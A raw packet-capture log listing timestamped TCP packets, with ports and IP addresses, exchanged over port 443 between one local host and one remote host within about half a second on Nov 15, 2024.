Nov 15, 2024 18:14:15.436981916 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.436994076 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437182903 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437254906 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.437266111 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437498093 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437560081 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.437571049 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437673092 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437757969 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.437769890 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437902927 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.437974930 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.437985897 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.438682079 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.438755035 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.438766956 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.438865900 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.438931942 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.438941956 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439058065 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439125061 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.439136028 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439573050 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439645052 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.439656019 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439739943 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.439798117 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.439810038 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440198898 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440274954 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.440288067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440499067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440578938 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.440589905 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440617085 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440685987 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.440696955 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440767050 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.440917015 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.440927982 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441036940 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441108942 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.441121101 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441184998 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441256046 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.441267014 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441437960 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.441507101 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.441519022 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.473608017 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.473763943 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.473772049 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.473797083 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.473836899 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.524146080 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.524163008 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550244093 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550401926 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550410032 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550442934 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550461054 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550568104 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550569057 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550590038 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550628901 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550676107 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550760984 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550828934 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550842047 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550894976 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.550967932 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.550978899 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551110983 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551182032 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.551192045 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551474094 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551548958 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.551559925 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551681042 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551749945 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.551762104 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551927090 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.551995039 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.552006006 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552156925 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552248001 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.552258968 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552431107 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552505016 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.552515984 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552676916 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552747011 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.552758932 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.552937984 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553009033 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.553020000 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553124905 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553199053 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.553209066 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553371906 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553442955 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.553455114 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553507090 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553577900 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.553590059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553807974 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.553867102 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.553879023 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.554522038 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.554595947 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.554606915 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.554781914 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.554878950 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.554889917 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.554969072 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555042982 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.555054903 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555145979 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555242062 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.555252075 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555470943 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555542946 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.555553913 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555699110 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555763006 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.555773020 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555840015 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.555912971 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.555923939 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556031942 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556097984 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.556109905 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556230068 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556293964 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.556304932 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556415081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556493044 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.556503057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556658983 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.556729078 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.556740999 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.557815075 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.557972908 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.557984114 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558048010 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558120012 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.558130980 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558233976 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558306932 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.558317900 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558490038 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558557987 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.558569908 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558672905 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558753014 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.558764935 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558902025 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.558971882 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.558983088 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559154987 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559223890 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.559251070 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559304953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559374094 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.559386969 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559485912 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559552908 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.559565067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559694052 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.559760094 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.559770107 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560024977 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560101986 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.560112953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560168982 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560240984 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.560251951 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560420990 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560484886 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.560496092 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560561895 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560691118 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.560703039 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560738087 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.560801983 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.560813904 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.592556953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.592716932 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.592775106 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.592781067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.592937946 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670192003 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670351028 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670356989 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670372963 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670510054 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670519114 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670546055 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670586109 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670681953 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670746088 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670749903 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670828104 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670888901 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.670893908 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.670967102 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671036959 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.671041012 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671080112 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671140909 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.671145916 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671462059 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671529055 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.671534061 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671598911 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671665907 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.671670914 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671818018 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671881914 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.671885967 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.671951056 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672015905 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672019958 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672094107 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672158957 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672163010 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672239065 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672297955 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672302008 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672384977 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672451019 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672455072 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672636986 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672700882 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672704935 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672847033 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672926903 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.672930956 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.672988892 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673052073 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.673058033 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673286915 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673371077 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.673374891 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673618078 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673676014 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.673680067 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673849106 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.673907995 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.673913956 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674061060 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674118042 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.674122095 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674314022 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674372911 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.674376965 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674495935 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674552917 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.674556971 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674694061 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674770117 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.674776077 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.674972057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675030947 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.675035954 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675215006 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675277948 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.675282001 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675432920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675493002 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.675498009 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675630093 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675688028 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.675692081 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675767899 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.675827980 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.675832033 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678005934 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678069115 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.678073883 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678221941 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678280115 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.678283930 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678383112 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.678442001 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.678447008 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.684520006 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.684616089 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.684628963 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.684884071 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.684962988 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.684973955 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.685142994 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.685220003 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.685230970 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.706661940 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.706760883 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.706774950 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.712150097 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.712245941 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.712259054 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.712666988 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.712743044 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.712754965 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.713274956 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.713351011 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.713363886 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.713754892 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.713830948 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.713845015 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.714584112 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.714653015 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.714664936 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.728043079 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.728132963 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.728151083 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.774168968 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.789376020 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.789408922 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.789573908 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.789684057 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.789704084 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.789736986 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.789737940 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.789737940 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.789760113 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790096045 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790177107 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790189981 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790241003 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790318966 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790332079 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790388107 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790498018 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790589094 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790600061 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790657997 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:15.790730000 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:15.790740967 CET	443	49705	142.215.209.78	192.168.2.5
